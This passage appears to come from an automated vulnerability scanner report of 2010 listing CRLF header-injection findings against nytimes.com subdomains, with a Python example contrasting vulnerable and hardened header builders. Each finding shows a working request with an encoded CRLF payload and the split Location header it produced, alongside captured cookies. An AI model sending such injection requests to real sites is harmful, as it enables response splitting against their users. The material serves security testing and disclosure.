Set-Cookie: everest_g_v2=g_surferid~s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~s5ZM3fm0AQAAAaI~ev_uid~2519~ev_sid~3~ev_clientid~b5412
cbbc9e6376e
~ev_clickid~s5ZM3fm0AQAAAaI~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT
Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=3&ev_clientid=b5412
cbbc9e6376e&url=http:/clickserve.dartsearch.net/link/click&ef_id=s5ZM3fm0AQAAAaI:20101113023636:s
Expires: Sat, 13 Nov 2010 02:36:36 GMT
Content-Length: 503
Keep-Alive: timeout=15, max=553
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_
...[SNIP]...
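
Why the Location headers in 2.23 and 2.24 and the Set-Cookie headers in 2.25 and 2.26 split, and what the fix looks like, as an added example that is not code from the report or from either site: the vulnerable builders concatenate URL-decoded request data into the header exactly as the responses above imply (the real server code is not on this page, so that construction is an assumption), while the hardened ones re-encode each path segment with urllib.parse.quote or reject cookie values that fall outside the RFC 6265 cookie-octet set. The input constants are the decoded 2.23 path and 2.25 ev_sid value; every function name is this example's own.

```python
import re
from urllib.parse import quote

# RFC 3986 sub-delims plus ':' and '@' may stay unencoded inside a path
# segment; urllib.parse.quote always keeps unreserved characters. '/' is
# deliberately absent so a segment cannot grow extra path components.
_SEGMENT_SAFE = "!$&'()*+,;=:@"

# RFC 6265 cookie-octet: printable US-ASCII minus CTLs, SP, DQUOTE, ',', ';', '\'.
_COOKIE_OCTETS = re.compile(r"[\x21\x23-\x2b\x2d-\x3a\x3c-\x5b\x5d-\x7e]*")


def wire_lines(header: str) -> int:
    """Number of lines a header occupies on the wire. Anything above 1 means a
    client will parse the overflow as further headers (or, after an empty
    line, as the body). CRLF and bare LF are counted alike."""
    return len(re.split(r"\r?\n", header))


def location_vulnerable(host: str, decoded_path: str) -> str:
    """Construction consistent with the 301 responses above: the already
    URL-decoded request path is concatenated into Location unchanged."""
    return f"Location: http://{host}{decoded_path}"


def location_hardened(host: str, decoded_path: str) -> str:
    """Re-encode every segment before it reaches the header. CR and LF become
    %0D%0A, so the redirect stays on one line and still names the same
    resource once the browser decodes it."""
    encoded = "/".join(quote(seg, safe=_SEGMENT_SAFE) for seg in decoded_path.split("/"))
    return f"Location: http://{host}{encoded}"


def is_cookie_octets(value: str) -> bool:
    """True when every character of value is an RFC 6265 cookie-octet."""
    return _COOKIE_OCTETS.fullmatch(value) is not None


def set_cookie_vulnerable(name: str, value: str) -> str:
    """The everest_cookie pattern: request-derived fields joined with '~'
    and emitted as-is."""
    return f"Set-Cookie: {name}={value}; path=/"


def set_cookie_hardened(name: str, value: str) -> str:
    """Refuse anything outside cookie-octet instead of trying to escape it: a
    cookie value is not a free-text field, and a CR, LF, ';' or ',' in one
    always means tampering or a bug upstream."""
    if not is_cookie_octets(value):
        raise ValueError(f"cookie {name!r}: value is not RFC 6265 cookie-octet")
    return f"Set-Cookie: {name}={value}; path=/"


# Constructed inputs: the decoded forms of the 2.23 and 2.25 payloads above.
PATH_2_23 = "/ref/membercenter/help/ba656\r\nc1c6899a20"
EV_SID_2_25 = "56e58\r\nd99abd59502"
COOKIE_2_25 = f"ev_surferid~7KpM3fm0AwAAKus~ev_uid~2519~ev_sid~{EV_SID_2_25}"

if __name__ == "__main__":
    for hdr in (location_vulnerable("www.nytimes.com", PATH_2_23),
                location_hardened("www.nytimes.com", PATH_2_23),
                set_cookie_vulnerable("everest_cookie", COOKIE_2_25)):
        print(wire_lines(hdr), repr(hdr))
    try:
        set_cookie_hardened("everest_cookie", COOKIE_2_25)
    except ValueError as exc:
        print("rejected:", exc)
```

location_hardened assumes the host comes from server configuration rather than from the request. The cookie builder rejects rather than escapes; if request data genuinely has to ride in a cookie, encode it (percent- or base64-encode) before it reaches set_cookie_hardened, so the stored value is still pure cookie-octets.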

2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater2.nytimes.com
Path:   /gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89d8a%0d%0af550ad8fb26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89d8a%0d%0af550ad8fb26/theater/tabclist.html HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:59 GMT
Content-length: 0
Content-type: text/html
Location: http://theater.nytimes.com/89d8a
f550ad8fb26
/theater/tabclist.html


2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater2.nytimes.com
Path:   /gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 99ac1%0d%0aaf9b8979722 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /gst/99ac1%0d%0aaf9b8979722/tabclist.html HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:59 GMT
Content-length: 0
Content-type: text/html
Location: http://theater.nytimes.com/gst/99ac1
af9b8979722
/tabclist.html


2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://theater2.nytimes.com
Path:   /gst/theater/tabclist.html

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dbbee%0d%0adec65f30f2e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /gst/theater/dbbee%0d%0adec65f30f2e HTTP/1.1
Host: theater2.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:59 GMT
Content-length: 0
Content-type: text/html
Location: http://theater.nytimes.com/gst/theater/dbbee
dec65f30f2e



2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload aa7f7%0d%0ac83acbda829 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/aa7f7%0d%0ac83acbda829/business/companies/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:01 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/aa7f7
c83acbda829
/business/companies/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2bbb8%0d%0aba85651de7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/2bbb8%0d%0aba85651de7d/companies/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/2bbb8
ba85651de7d
/companies/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload b9baf%0d%0aa1360d28e2e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/business/b9baf%0d%0aa1360d28e2e/facebook_inc/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/business/b9baf
a1360d28e2e
/facebook_inc/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/companies/facebook_inc/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload c984f%0d%0a8bf08eaef82 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/business/companies/c984f%0d%0a8bf08eaef82/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/business/companies/c984f
8bf08eaef82
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 452b3%0d%0a45e72dace08 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/452b3%0d%0a45e72dace08/international/countriesandterritories/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:01 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/452b3
45e72dace08
/international/countriesandterritories/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 702ff%0d%0af1bdf025466 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/702ff%0d%0af1bdf025466/countriesandterritories/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/702ff
f1bdf025466
/countriesandterritories/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload dd652%0d%0aabf2c5794ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/dd652%0d%0aabf2c5794ae/afghanistan/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/dd652
abf2c5794ae
/afghanistan/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/afghanistan/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 27e5f%0d%0a005360684f4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/countriesandterritories/27e5f%0d%0a005360684f4/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:57:03 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/countriesandterritories/27e5f
005360684f4
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ac067%0d%0a8fd1d3084c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/ac067%0d%0a8fd1d3084c5/international/countriesandterritories/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:27 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/ac067
8fd1d3084c5
/international/countriesandterritories/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b1249%0d%0aa65178becf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/b1249%0d%0aa65178becf8/countriesandterritories/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:27 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/b1249
a65178becf8
/countriesandterritories/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 32910%0d%0a75a8d968bdf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/32910%0d%0a75a8d968bdf/haiti/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:28 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/international/32910
75a8d968bdf
/haiti/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/international/countriesandterritories/haiti/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 4754f%0d%0a05a44130f21 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/international/countriesandterritories/4754f%0d%0a05a44130f21/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:56:29 GMT
Content-length: 122
Content-type: text/html
